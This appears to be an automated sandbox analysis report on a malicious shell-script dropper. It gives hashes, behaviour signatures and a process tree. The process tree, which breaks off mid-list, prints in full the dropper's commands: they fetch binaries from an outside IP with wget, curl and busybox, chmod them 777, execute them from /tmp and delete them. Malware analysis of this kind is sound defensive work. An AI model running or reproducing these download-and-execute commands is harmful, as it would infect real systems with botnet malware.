Analysis
-
max time kernel
74s -
max time network
120s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
14-11-2024 02:43
Static task
static1
Behavioral task
behavioral1
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
-
Size
10KB
-
MD5
682075683081d9fc281b9f47dbc13513
-
SHA1
a2abfb0ba39a3deacc4cd4cc13539ae72b7e1ec9
-
SHA256
812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618
-
SHA512
7122fd7e2576ed1a72dc091536927c59e3e7c57c43165431b710449d59bd4df65913b942b8ce34d710d042d29c55c58cca994ca61be785e2f33a169412e0ee52
-
SSDEEP
192:m/h372hBD3KaKVRcABDoKaKVR8LV/r37Z:5nD1ABDo/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 827 chmod 845 chmod 938 chmod 974 chmod 821 chmod 890 chmod 902 chmod 986 chmod 950 chmod 980 chmod 992 chmod 932 chmod 799 chmod 884 chmod 896 chmod 914 chmod 920 chmod 752 chmod 758 chmod 768 chmod 944 chmod 962 chmod 872 chmod 878 chmod 908 chmod 926 chmod 956 chmod 968 chmod -
Executes dropped EXE 28 IoCs
Processes:
ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFShyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRRPjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlVqxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQlaiau4cN6ui4dUhdtLO7AszWQd9X2AFpm21TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpjMMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJnQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFRgKXcUWSnaVAlkPeODets4f6GbEr74zFmNMqOpad8fEABX2m6C2lykVUYrbhlTb579lU1XeSlCkRjhDywGAQfziHeoondE5FGa7JIQAeD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHyebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPSMMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJnQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFRgKXcUWSnaVAlkPeODets4f6GbEr74zFmNM1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpjqOpad8fEABX2m6C2lykVUYrbhlTb579lU1XeSlCkRjhDywGAQfziHeoondE5FGa7JIQAeD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHyebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPSODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFShyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRRPjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlVqxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQlaiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2ioc pid Process /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS 753 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR 759 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV 769 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ 801 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 822 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj 828 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ 847 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI 873 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR 879 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM 885 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 891 qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA 897 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy 903 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS 909 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ 915 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI 921 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR 927 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM 933 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj 939 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 945 qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA 951 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy 957 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS 963 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS 969 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR 975 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV 981 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ 987 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 993 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI curl File opened for modification /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV curl File opened for modification /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR curl File opened for modification /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM curl File opened for modification /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 curl File opened for modification /tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1 curl File opened for modification /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA curl File opened for modification /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS curl File opened for modification /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR curl File opened for modification /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ curl File opened for modification /tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS curl File opened for modification /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj curl File opened for modification /tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR curl File opened for modification /tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV curl File opened for modification /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS curl File opened for modification /tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj curl File opened for modification /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy curl File opened for modification /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 curl File opened for modification /tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ curl File opened for modification /tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2 curl File opened for modification /tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA curl File opened for modification /tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR curl File opened for modification /tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI curl File opened for modification /tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM curl File opened for modification /tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy curl File opened for modification /tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS curl File opened for modification /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ curl File opened for modification /tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ curl
Processes
-
/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:725
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:750
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:754
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:755
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:757
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:760
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:761
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:763
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:773
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:774
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:793
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:805
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:806
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:820
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:823
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:824
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:826
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:829
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:830
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:839
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:849
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:871
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:877
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:883
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:889
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:895
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:901
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:907
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:913
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:919
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:925
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:931
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:937
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
